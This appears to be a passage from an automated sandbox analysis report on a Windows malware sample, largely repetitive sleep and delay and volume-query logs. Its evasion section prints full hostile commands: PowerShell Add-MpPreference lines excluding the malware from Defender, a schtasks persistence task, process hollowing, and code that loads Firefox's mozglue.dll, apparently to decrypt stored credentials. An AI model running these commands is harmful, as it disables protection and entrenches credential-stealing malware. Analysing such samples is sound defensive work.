                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598797s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598687s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598578s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598469s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598246s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598140s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597921s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597702s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597593s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597484s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597375s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597266s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597141s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -597031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596594s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596484s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596374s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596155s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -596046s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595937s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595498s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595389s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595281s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -595062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -594953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -594844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -594734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -594625s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7664Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598953Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598719Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598279Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597844Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597609Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597500Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597063Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596250Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594688Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594452Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599890
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599672
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599562
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599125
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599015
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598906
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598797
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598687
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598578
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598469
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598359
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598246
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598140
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598031
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597921
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597812
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597702
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597593
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597484
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597375
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597266
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597141
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597031
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596922
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596812
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596703
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596594
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596484
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596374
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596265
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596155
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596046
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595937
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595828
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595719
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595609
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595498
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595389
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595281
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595172
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595062
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 594953
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 594844
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 594734
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 594625
                Source: PvAmrCZENy.exe, 00000007.00000002.2129290212.0000000000955000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
                Source: svchost.exe, 0000000D.00000002.2131053195.0000022AE622B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2132878715.0000022AEB85B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: yxXYABHh.exe, 0000000C.00000002.2129109732.0000000000EE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06409548 LdrInitializeThunk,LdrInitializeThunk,7_2_06409548
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory written: C:\Users\user\AppData\Roaming\yxXYABHh.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Users\user\Desktop\PvAmrCZENy.exe "C:\Users\user\Desktop\PvAmrCZENy.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess created: C:\Users\user\AppData\Roaming\yxXYABHh.exe "C:\Users\user\AppData\Roaming\yxXYABHh.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Users\user\Desktop\PvAmrCZENy.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
